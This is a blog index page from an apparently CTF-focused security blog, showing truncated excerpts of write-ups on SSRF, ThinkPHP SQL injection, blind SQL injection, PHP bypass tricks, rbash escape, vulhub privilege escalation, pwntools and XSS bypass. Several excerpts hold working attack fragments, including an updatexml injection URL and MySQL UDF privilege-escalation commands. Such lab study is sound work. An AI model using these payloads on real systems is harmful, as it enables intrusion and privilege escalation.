iloveflag-blog

iloveflag.com

hitcon-ctf-2017-ssrfme
A friend sent me a web challenge; a quick search showed it is from HITCON CTF 2017. I had previously done the HITCON 2017 challenge babyfirst-revenge on i春秋, and the quality was very good. Dockerfile: https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/ssrfme
<?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir(...
thinkphp5.0_sql_injection analysis
payload: http://127.0.0.1/thinkphp5.0.15/public/index.php/index/index/index?password[0]=inc&password[1]=updatexml(1,concat(0x7e,version()),1)&password[2]=1
source:
//index.php
<?php
namespace app\index\controller;
use think\Db;
class Index{ public function ...
de1tactf2019_ssrf_me
#! /usr/bin/env python
#encoding=utf-8
from flask impo...
SQL injection
Union queries and ORDER BY blind injection. Blind SQL Injections. About Blind SQL Injections: in a reasonably well-built production application you generally cannot see error responses on the page, so you cannot extract data through UNION attacks or error-based attacks. You have to use blind SQL injection attacks to extract data. The...
Quick reference notes
Quick reference notes. File leaks: .git, .svn, .DS_Store; vim leaks: .index.php.swp; common leaked web files: index.php~, index.phps, www.zip, www.tar.gz. Common dangerous functions: strcmp: comparison function, array bypass; extract: variable overwrite when exporting variables from a user-controlled array; parse_str: parses variables and can take in uninitialized data, URL encoding is possible, variable-overwrite vulnerability; intval: integer-conversion bypass, payload: id=1024.1; ereg: %00 truncation; addslashes: wide-byte injection, %df swallows the \; XFF: X-Forwarded-For: client...
rbash escape
Restricted shells and rbash. What is a restricted shell? As the name suggests, it is a restricted shell that only lets a user run the commands the network administrator allows, greatly limiting the user's privileges. Variants include rbash (the restricted mode of bash), ksh (similarly, the Korn shell's restricted mode) and rsh (the restricted mode of the Bourne shell sh). The following focuses on rbash. rbash is a symlink to bash -r; you can enter it with rbash or directly with bash -r. rbash configuration: before studying rbash escapes...
vulhub-learning
Raven1
1. Use python to open a shell terminal: sudo python -c 'import pty;pty.spawn("/bin/bash")'
3. UDF privilege escalation:
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
create table foo(line blob);
insert into foo values(load_file('/var/www/html/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin...
Apache multi-IP virtual host configuration + file server with username and password
Current IP: 172.19.16.219/24. Add two IPs: ip addr add 172.19.16.220/24 dev eth0; ip addr add 172.19.16.221/24 dev eth0. Create the web1, web2 and web3 directories under /var/www/html/. Configure /etc/httpd/conf/httpd.conf: comment out #DocumentRoot "/var/www/html"
<VirtualHost 172.19.16.219:8080> ServerName web1.zmbxzrq.com DocumentRoot "/var/www/h...
pwn study notes
Common pwntools commands: p64(int): packs 8 bytes as one group, least significant byte first, in order; u64(str): the inverse of the above; p32(int); u32(str); remote(host, port) / process(path); .recv(int): 7 => Hello world! => 'Hello w'; .recvuntil(str): 'or' => Hello world! => 'Hello wor'; .recvline() === .recvuntil('\n'); .send(str): 'payload' => 'payload'; .sendline(str): '...
2019 西湖论剑 web
web1: on the home page there is an include $_GET['file']; a hint at the bottom suggests using a PHP pseudo-protocol to read out the source. After base64 decoding it is:
<?php $a = @$_GET['dir']; if(!$a){$a = '/tmp';} var_dump(scandir($a));
Directory traversal finds the flag; go back to the home page and read the flag. web2: XSS; script is filtered, so bypass with an iframe tag plus a data: URI with base64 encoding. payload:
<iframe src="data:text/html...